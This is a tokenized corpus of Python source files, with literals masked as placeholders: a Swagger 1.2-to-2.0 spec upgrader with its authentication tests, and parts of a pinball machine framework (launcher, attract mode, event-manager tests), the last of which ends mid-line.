<s> from __future__ import absolute_import <EOL> from ... spec . base import NullContext <EOL> from ... scan import Dispatcher <EOL> from ... errs import SchemaError <EOL> from ... utils import scope_compose , get_or_none <EOL> from ... consts import private <EOL> from ... spec . v1_2 . objects import ( <EOL> ResourceList , <EOL> Resource , <EOL> Operation , <EOL> Authorization , <EOL> Parameter , <EOL> Model , <EOL> ) <EOL> from ... spec . v2_0 import objects <EOL> import os <EOL> import six <EOL> def update_type_and_ref ( dst , src , scope , sep , app ) : <EOL> ref = getattr ( src , '<STR_LIT>' ) <EOL> if ref : <EOL> dst . update_field ( '<STR_LIT>' , '<STR_LIT>' + scope_compose ( scope , ref , sep = sep ) ) <EOL> if app . prim_factory . is_primitive ( getattr ( src , '<STR_LIT:type>' , None ) ) : <EOL> dst . update_field ( '<STR_LIT:type>' , src . type . lower ( ) ) <EOL> elif src . type : <EOL> dst . update_field ( '<STR_LIT>' , '<STR_LIT>' + scope_compose ( scope , src . type , sep = sep ) ) <EOL> def convert_min_max ( dst , src ) : <EOL> def _from_str ( name ) : <EOL> v = getattr ( src , name , None ) <EOL> if v : <EOL> if src . type == '<STR_LIT>' : <EOL> dst . update_field ( name , int ( float ( v ) ) ) <EOL> elif src . type == '<STR_LIT>' : <EOL> dst . update_field ( name , float ( v ) ) <EOL> else : <EOL> raise SchemaError ( '<STR_LIT>' . format ( src . type ) ) <EOL> else : <EOL> dst . update_field ( name , None ) <EOL> _from_str ( '<STR_LIT>' ) <EOL> _from_str ( '<STR_LIT>' ) <EOL> def convert_schema_from_datatype ( obj , scope , sep , app ) : <EOL> if obj == None : <EOL> return None <EOL> s = objects . Schema ( NullContext ( ) ) <EOL> update_type_and_ref ( s , obj , scope , sep , app ) <EOL> s . update_field ( '<STR_LIT>' , obj . format ) <EOL> if obj . is_set ( '<STR_LIT>' ) : <EOL> s . update_field ( '<STR_LIT:default>' , obj . defaultValue ) <EOL> convert_min_max ( s , obj ) <EOL> s . update_field ( '<STR_LIT>' , obj . uniqueItems ) <EOL> s . 
update_field ( '<STR_LIT>' , obj . enum ) <EOL> if obj . items : <EOL> i = objects . Schema ( NullContext ( ) ) <EOL> update_type_and_ref ( i , obj . items , scope , sep , app ) <EOL> i . update_field ( '<STR_LIT>' , obj . items . format ) <EOL> s . update_field ( '<STR_LIT>' , i ) <EOL> return s <EOL> def convert_items ( o , app ) : <EOL> item = objects . Items ( NullContext ( ) ) <EOL> if getattr ( o , '<STR_LIT>' ) : <EOL> raise SchemaError ( '<STR_LIT>' ) <EOL> if not app . prim_factory . is_primitive ( getattr ( o , '<STR_LIT:type>' , None ) ) : <EOL> raise SchemaError ( '<STR_LIT>' ) <EOL> item . update_field ( '<STR_LIT:type>' , o . type . lower ( ) ) <EOL> item . update_field ( '<STR_LIT>' , o . format ) <EOL> return item <EOL> class Upgrade ( object ) : <EOL> """<STR_LIT>""" <EOL> class Disp ( Dispatcher ) : pass <EOL> def __init__ ( self , sep = private . SCOPE_SEPARATOR ) : <EOL> self . __swagger = None <EOL> self . __sep = sep <EOL> @ Disp . register ( [ ResourceList ] ) <EOL> def _resource_list ( self , path , obj , app ) : <EOL> o = objects . Swagger ( NullContext ( ) ) <EOL> info = objects . Info ( NullContext ( ) ) <EOL> info . update_field ( '<STR_LIT:version>' , obj . apiVersion ) <EOL> info . update_field ( '<STR_LIT:title>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT:title>' ) ) <EOL> info . update_field ( '<STR_LIT:description>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT:description>' ) ) <EOL> info . update_field ( '<STR_LIT>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> if obj . info . contact : <EOL> contact = objects . Contact ( NullContext ( ) ) <EOL> contact . update_field ( '<STR_LIT:email>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> info . update_field ( '<STR_LIT>' , contact ) <EOL> if obj . info . license or obj . info . licenseUrl : <EOL> license = objects . License ( NullContext ( ) ) <EOL> license . 
update_field ( '<STR_LIT:name>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> license . update_field ( '<STR_LIT:url>' , get_or_none ( obj , '<STR_LIT:info>' , '<STR_LIT>' ) ) <EOL> info . update_field ( '<STR_LIT>' , license ) <EOL> o . update_field ( '<STR_LIT:info>' , info ) <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , [ '<STR_LIT:http>' , '<STR_LIT>' ] ) <EOL> o . update_field ( '<STR_LIT:host>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT:produces>' , [ ] ) <EOL> self . __swagger = o <EOL> @ Disp . register ( [ Resource ] ) <EOL> def _resource ( self , path , obj , app ) : <EOL> name = obj . get_name ( path ) <EOL> for t in self . __swagger . tags : <EOL> if t . name == name : <EOL> break <EOL> else : <EOL> tt = objects . Tag ( NullContext ( ) ) <EOL> tt . update_field ( '<STR_LIT:name>' , name ) <EOL> self . __swagger . tags . append ( tt ) <EOL> @ Disp . register ( [ Operation ] ) <EOL> def _operation ( self , path , obj , app ) : <EOL> o = objects . Operation ( NullContext ( ) ) <EOL> scope = obj . _parent_ . get_name ( path ) <EOL> o . update_field ( '<STR_LIT>' , [ scope ] ) <EOL> o . update_field ( '<STR_LIT>' , obj . nickname ) <EOL> o . update_field ( '<STR_LIT>' , obj . summary ) <EOL> o . update_field ( '<STR_LIT:description>' , obj . notes ) <EOL> o . update_field ( '<STR_LIT>' , obj . deprecated == '<STR_LIT:true>' ) <EOL> c = obj . consumes if obj . consumes and len ( obj . consumes ) > <NUM_LIT:0> else obj . _parent_ . consumes <EOL> o . 
update_field ( '<STR_LIT>' , c if c else [ ] ) <EOL> p = obj . produces if obj . produces and len ( obj . produces ) > <NUM_LIT:0> else obj . _parent_ . produces <EOL> o . update_field ( '<STR_LIT:produces>' , p if p else [ ] ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> o . update_field ( '<STR_LIT>' , [ ] ) <EOL> _auth = obj . authorizations if obj . authorizations and len ( obj . authorizations ) > <NUM_LIT:0> else obj . _parent_ . authorizations <EOL> if _auth : <EOL> for name , scopes in six . iteritems ( _auth ) : <EOL> o . security . append ( { name : [ v . scope for v in scopes ] } ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> resp = objects . Response ( NullContext ( ) ) <EOL> if obj . type != '<STR_LIT>' : <EOL> resp . update_field ( '<STR_LIT>' , convert_schema_from_datatype ( obj , scope , self . __sep , app ) ) <EOL> o . responses [ '<STR_LIT:default>' ] = resp <EOL> path = obj . _parent_ . basePath + obj . path <EOL> if path not in self . __swagger . paths : <EOL> self . __swagger . paths [ path ] = objects . PathItem ( NullContext ( ) ) <EOL> method = obj . method . lower ( ) <EOL> self . __swagger . paths [ path ] . update_field ( method , o ) <EOL> @ Disp . register ( [ Authorization ] ) <EOL> def _authorization ( self , path , obj , app ) : <EOL> o = objects . SecurityScheme ( NullContext ( ) ) <EOL> if obj . type == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> else : <EOL> o . update_field ( '<STR_LIT:type>' , obj . type ) <EOL> o . update_field ( '<STR_LIT>' , { } ) <EOL> for s in obj . scopes or [ ] : <EOL> o . scopes [ s . scope ] = s . description <EOL> if o . type == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT>' , get_or_none ( obj , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:url>' ) ) <EOL> o . update_field ( '<STR_LIT>' , get_or_none ( obj , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:url>' ) ) <EOL> if o . authorizationUrl : <EOL> o . 
update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif o . tokenUrl : <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif o . type == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT:name>' , obj . keyname ) <EOL> o . update_field ( '<STR_LIT>' , obj . passAs ) <EOL> self . __swagger . securityDefinitions [ obj . get_name ( path ) ] = o <EOL> @ Disp . register ( [ Parameter ] ) <EOL> def _parameter ( self , path , obj , app ) : <EOL> o = objects . Parameter ( NullContext ( ) ) <EOL> scope = obj . _parent_ . _parent_ . get_name ( path ) <EOL> o . update_field ( '<STR_LIT:name>' , obj . name ) <EOL> o . update_field ( '<STR_LIT>' , obj . required ) <EOL> o . update_field ( '<STR_LIT:description>' , obj . description ) <EOL> if obj . paramType == '<STR_LIT>' : <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> o . update_field ( '<STR_LIT>' , obj . paramType ) <EOL> if '<STR_LIT:body>' == getattr ( o , '<STR_LIT>' ) : <EOL> o . update_field ( '<STR_LIT>' , convert_schema_from_datatype ( obj , scope , self . __sep , app ) ) <EOL> else : <EOL> if getattr ( obj , '<STR_LIT>' ) : <EOL> raise SchemaError ( '<STR_LIT>' ) <EOL> if obj . allowMultiple == True and obj . items == None : <EOL> o . update_field ( '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , obj . uniqueItems ) <EOL> o . update_field ( '<STR_LIT>' , convert_items ( obj , app ) ) <EOL> if obj . is_set ( "<STR_LIT>" ) : <EOL> o . update_field ( '<STR_LIT:default>' , [ obj . defaultValue ] ) <EOL> o . items . update_field ( '<STR_LIT>' , obj . enum ) <EOL> else : <EOL> o . update_field ( '<STR_LIT:type>' , obj . type . lower ( ) ) <EOL> o . update_field ( '<STR_LIT>' , obj . format ) <EOL> if obj . is_set ( "<STR_LIT>" ) : <EOL> o . update_field ( '<STR_LIT:default>' , obj . defaultValue ) <EOL> convert_min_max ( o , obj ) <EOL> o . update_field ( '<STR_LIT>' , obj . enum ) <EOL> if obj . items : <EOL> o . 
update_field ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> o . update_field ( '<STR_LIT>' , obj . uniqueItems ) <EOL> o . update_field ( '<STR_LIT>' , convert_items ( obj . items , app ) ) <EOL> path = obj . _parent_ . _parent_ . basePath + obj . _parent_ . path <EOL> method = obj . _parent_ . method . lower ( ) <EOL> op = getattr ( self . __swagger . paths [ path ] , method ) <EOL> op . parameters . append ( o ) <EOL> @ Disp . register ( [ Model ] ) <EOL> def _model ( self , path , obj , app ) : <EOL> scope = obj . _parent_ . get_name ( path ) <EOL> s = scope_compose ( scope , obj . get_name ( path ) , sep = self . __sep ) <EOL> o = self . __swagger . definitions . get ( s , None ) <EOL> if not o : <EOL> o = objects . Schema ( NullContext ( ) ) <EOL> self . __swagger . definitions [ s ] = o <EOL> props = { } <EOL> for name , prop in six . iteritems ( obj . properties ) : <EOL> props [ name ] = convert_schema_from_datatype ( prop , scope , self . __sep , app ) <EOL> props [ name ] . update_field ( '<STR_LIT:description>' , prop . description ) <EOL> o . update_field ( '<STR_LIT>' , props ) <EOL> o . update_field ( '<STR_LIT>' , obj . required ) <EOL> o . update_field ( '<STR_LIT>' , obj . discriminator ) <EOL> o . update_field ( '<STR_LIT:description>' , obj . description ) <EOL> for t in obj . subTypes or [ ] : <EOL> sub_s = scope_compose ( scope , t , sep = self . __sep ) <EOL> sub_o = self . __swagger . definitions . get ( sub_s , None ) <EOL> if not sub_o : <EOL> sub_o = objects . Schema ( NullContext ( ) ) <EOL> self . __swagger . definitions [ sub_s ] = sub_o <EOL> new_ref = objects . Schema ( NullContext ( ) ) <EOL> new_ref . update_field ( '<STR_LIT>' , '<STR_LIT>' + s ) <EOL> sub_o . allOf . append ( new_ref ) <EOL> @ property <EOL> def swagger ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . __swagger : <EOL> return None <EOL> common_path = os . path . commonprefix ( self . __swagger . paths . 
keys ( ) ) <EOL> common_path = common_path [ : - <NUM_LIT:1> ] if common_path [ - <NUM_LIT:1> ] == '<STR_LIT:/>' else common_path <EOL> if len ( common_path ) > <NUM_LIT:0> : <EOL> p = six . moves . urllib . parse . urlparse ( common_path ) <EOL> self . __swagger . update_field ( '<STR_LIT:host>' , p . netloc ) <EOL> new_common_path = six . moves . urllib . parse . urlunparse ( ( <EOL> p . scheme , p . netloc , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> new_path = { } <EOL> for k in self . __swagger . paths . keys ( ) : <EOL> new_path [ k [ len ( new_common_path ) : ] ] = self . __swagger . paths [ k ] <EOL> self . __swagger . update_field ( '<STR_LIT>' , new_path ) <EOL> return self . __swagger </s>
<s> from pyswagger import SwaggerApp , SwaggerSecurity <EOL> from . . utils import get_test_data_folder <EOL> import unittest <EOL> app = SwaggerApp . _create_ ( get_test_data_folder ( version = '<STR_LIT>' , which = '<STR_LIT>' ) ) <EOL> class BasicAuthAndApiKeyTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . s = SwaggerSecurity ( app ) <EOL> self . s . update_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . s . update_with ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . s . update_with ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . s . update_with ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_deleteUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertTrue ( '<STR_LIT>' in req . header ) <EOL> self . assertEqual ( req . header [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_getUserByName ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> qk = [ x for x in req . query if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> self . assertTrue ( len ( qk ) > <NUM_LIT:0> ) <EOL> self . assertEqual ( qk [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> def test_createUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( body = dict ( id = <NUM_LIT:0> , username = '<STR_LIT>' , firstName = '<STR_LIT>' , lastName = '<STR_LIT>' ) ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertTrue ( '<STR_LIT>' in req . header ) <EOL> self . assertEqual ( req . header [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_getAllUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertTrue ( '<STR_LIT>' in req . header ) <EOL> self . assertEqual ( req . 
header [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> class NoAuthProvidedTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . s = SwaggerSecurity ( app ) <EOL> def test_deleteUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . header ) <EOL> def test_getUserByName ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( username = '<STR_LIT>' ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . query ) <EOL> def test_createUser ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( body = dict ( id = <NUM_LIT:0> , username = '<STR_LIT>' , firstName = '<STR_LIT>' , lastName = '<STR_LIT>' ) ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . header ) <EOL> def test_getAllUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> req , _ = app . op [ '<STR_LIT>' ] ( ) <EOL> self . s ( req ) . prepare ( ) <EOL> self . assertFalse ( '<STR_LIT>' in req . header ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from datetime import datetime <EOL> import socket <EOL> import os <EOL> import argparse <EOL> import errno <EOL> import version <EOL> import sys <EOL> from mpf . system . machine import MachineController <EOL> from mpf . system . utility_functions import Util <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT:-c>" , <EOL> action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> default = "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , const = logging . DEBUG , <EOL> default = logging . INFO , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , dest = "<STR_LIT>" , <EOL> default = logging . INFO , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> const = '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> const = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , dest = "<STR_LIT>" , default = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:store>" , dest = "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> default = os . path . join ( "<STR_LIT>" , datetime . now ( ) . strftime ( <EOL> "<STR_LIT>" + socket . gethostname ( ) + "<STR_LIT>" ) ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> default = os . path . 
join ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT:version>" , version = version . version_str , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> args . configfile = Util . string_to_list ( args . configfile ) <EOL> try : <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> except OSError as exception : <EOL> if exception . errno != errno . EEXIST : <EOL> raise <EOL> logging . basicConfig ( level = args . loglevel , <EOL> format = '<STR_LIT>' , <EOL> filename = args . logfile , <EOL> filemode = '<STR_LIT:w>' ) <EOL> console = logging . StreamHandler ( ) <EOL> console . setLevel ( args . consoleloglevel ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> console . setFormatter ( formatter ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( console ) <EOL> def main ( ) : <EOL> try : <EOL> machine = MachineController ( vars ( args ) ) <EOL> machine . run ( ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> except Exception , e : <EOL> logging . exception ( e ) <EOL> sys . exit ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> from version import __version__ </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from mpf . system . mode import Mode <EOL> import time <EOL> class Attract ( Mode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , machine , config , name , path ) : <EOL> super ( Attract , self ) . __init__ ( machine , config , name , path ) <EOL> self . start_button_pressed_time = <NUM_LIT:0.0> <EOL> self . start_hold_time = <NUM_LIT:0.0> <EOL> self . start_buttons_held = list ( ) <EOL> self . assets_waiting = <NUM_LIT:0> <EOL> def mode_start ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for switch in self . machine . switches . items_tagged ( <EOL> self . machine . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) : <EOL> self . switch_handlers . append ( <EOL> self . machine . switch_controller . add_switch_handler ( <EOL> switch . name , self . start_button_pressed , <NUM_LIT:1> ) ) <EOL> self . switch_handlers . append ( <EOL> self . machine . switch_controller . add_switch_handler ( <EOL> switch . name , self . start_button_released , <NUM_LIT:0> ) ) <EOL> if hasattr ( self . machine , '<STR_LIT>' ) : <EOL> self . machine . ball_controller . collect_balls ( ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> def start_button_pressed ( self ) : <EOL> """<STR_LIT>""" <EOL> self . start_button_pressed_time = time . time ( ) <EOL> def start_button_released ( self ) : <EOL> """<STR_LIT>""" <EOL> self . start_hold_time = time . time ( ) - self . start_button_pressed_time <EOL> self . start_buttons_held = list ( ) <EOL> for switch in self . machine . switches . items_tagged ( '<STR_LIT>' ) : <EOL> if self . machine . switch_controller . is_active ( switch . name ) : <EOL> self . start_buttons_held . append ( switch . name ) <EOL> self . machine . events . post_boolean ( '<STR_LIT>' , <EOL> callback = self . result_of_start_request ) <EOL> def result_of_start_request ( self , ev_result = True ) : <EOL> """<STR_LIT>""" <EOL> if ev_result is False : <EOL> self . log . 
debug ( "<STR_LIT>" ) <EOL> else : <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . machine . events . post ( '<STR_LIT>' , <EOL> buttons = self . start_buttons_held , <EOL> hold_time = self . start_hold_time ) </s>
<s> class ConfigParser ( object ) : <EOL> machine_wide_config = False <EOL> mode_config = False <EOL> config_section = '<STR_LIT>' <EOL> def __init__ ( self , machine ) : <EOL> self . machine = machine </s>
<s> from MpfTestCase import MpfTestCase <EOL> class TestEventManager ( MpfTestCase ) : <EOL> def __init__ ( self , test_map ) : <EOL> super ( TestEventManager , self ) . __init__ ( test_map ) <EOL> self . _handler1_args = tuple ( ) <EOL> self . _handler1_kwargs = dict ( ) <EOL> self . _handler1_called = <NUM_LIT:0> <EOL> self . _handler2_args = tuple ( ) <EOL> self . _handler2_kwargs = dict ( ) <EOL> self . _handler2_called = <NUM_LIT:0> <EOL> self . _handlers_called = list ( ) <EOL> self . _handler_returns_false_args = tuple ( ) <EOL> self . _handler_returns_false_kwargs = dict ( ) <EOL> self . _handler_returns_false_called = <NUM_LIT:0> <EOL> self . _relay1_called = <NUM_LIT:0> <EOL> self . _relay2_called = <NUM_LIT:0> <EOL> self . _relay_callback_args = tuple ( ) <EOL> self . _relay_callback_kwargs = dict ( ) <EOL> self . _relay_callback_called = <NUM_LIT:0> <EOL> self . _callback_args = tuple ( ) <EOL> self . _callback_kwargs = dict ( ) <EOL> self . _callback_called = <NUM_LIT:0> <EOL> self . _queue = None <EOL> self . _queue_callback_args = tuple ( ) <EOL> self . _queue_callback_kwargs = dict ( ) <EOL> self . _queue_callback_called = <NUM_LIT:0> <EOL> def getConfigFile ( self ) : <EOL> return '<STR_LIT>' <EOL> def getMachinePath ( self ) : <EOL> return '<STR_LIT>' <EOL> def event_handler1 ( self , * args , ** kwargs ) : <EOL> self . _handler1_args = args <EOL> self . _handler1_kwargs = kwargs <EOL> self . _handler1_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler1 ) <EOL> def event_handler2 ( self , * args , ** kwargs ) : <EOL> self . _handler2_args = args <EOL> self . _handler2_kwargs = kwargs <EOL> self . _handler2_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler2 ) <EOL> def event_handler_returns_false ( self , * args , ** kwargs ) : <EOL> self . _handler_returns_false_args = args <EOL> self . _handler_returns_false_kwargs = kwargs <EOL> self . 
_handler_returns_false_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler_returns_false ) <EOL> return False <EOL> def event_handler_relay1 ( self , relay_test ) : <EOL> self . _relay1_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler_relay1 ) <EOL> return { '<STR_LIT>' : relay_test } <EOL> def event_handler_relay2 ( self , relay_test ) : <EOL> self . _relay2_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . event_handler_relay2 ) <EOL> return { '<STR_LIT>' : relay_test - <NUM_LIT:1> } <EOL> def callback ( self , * args , ** kwargs ) : <EOL> self . _callback_args = args <EOL> self . _callback_kwargs = kwargs <EOL> self . _callback_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . callback ) <EOL> def relay_callback ( self , * args , ** kwargs ) : <EOL> self . _relay_callback_args = args <EOL> self . _relay_callback_kwargs = kwargs <EOL> self . _relay_callback_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . relay_callback ) <EOL> def event_handler_calls_second_event ( self ) : <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . _handlers_called . append ( self . event_handler_calls_second_event ) <EOL> def event_handler_add_queue ( self , queue ) : <EOL> self . _handlers_called . append ( self . event_handler_add_queue ) <EOL> self . _queue = queue <EOL> self . _queue . wait ( ) <EOL> def event_handler_add_quick_queue ( self , queue ) : <EOL> self . _handlers_called . append ( self . event_handler_add_quick_queue ) <EOL> self . _queue = queue <EOL> self . _queue . wait ( ) <EOL> self . _queue . clear ( ) <EOL> def event_handler_clear_queue ( self ) : <EOL> self . _handlers_called . append ( self . event_handler_clear_queue ) <EOL> self . _queue . clear ( ) <EOL> def queue_callback ( self , * args , ** kwargs ) : <EOL> self . _queue_callback_args = args <EOL> self . _queue_callback_kwargs = kwargs <EOL> self . 
_queue_callback_called += <NUM_LIT:1> <EOL> self . _handlers_called . append ( self . queue_callback ) <EOL> def test_event ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> def test_event_with_kwargs ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' , test1 = '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( { '<STR_LIT>' : '<STR_LIT>' } , self . _handler1_kwargs ) <EOL> def test_event_with_callback ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' , test1 = '<STR_LIT>' , <EOL> callback = self . callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _callback_called ) <EOL> def test_nested_callbacks ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , <EOL> self . event_handler_calls_second_event ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' , callback = self . callback ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:0> ] , <EOL> self . 
event_handler_calls_second_event ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:1> ] , <EOL> self . event_handler1 ) <EOL> self . assertEquals ( self . _handlers_called [ <NUM_LIT:2> ] , <EOL> self . callback ) <EOL> def test_event_handler_priorities ( self ) : <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler1 , <EOL> priority = <NUM_LIT:100> ) <EOL> self . machine . events . add_handler ( '<STR_LIT>' , self . event_handler2 , <EOL> priority = <NUM_LIT:200> ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . machine . events . post ( '<STR_LIT>' ) <EOL> self . advance_time_and_run ( <NUM_LIT:1> ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _handler1_called ) <EOL> self . assertEquals ( tuple ( ) , self . _handler1_args ) <EOL> self . assertEquals ( dict ( ) , self . _handler1_kwargs ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . 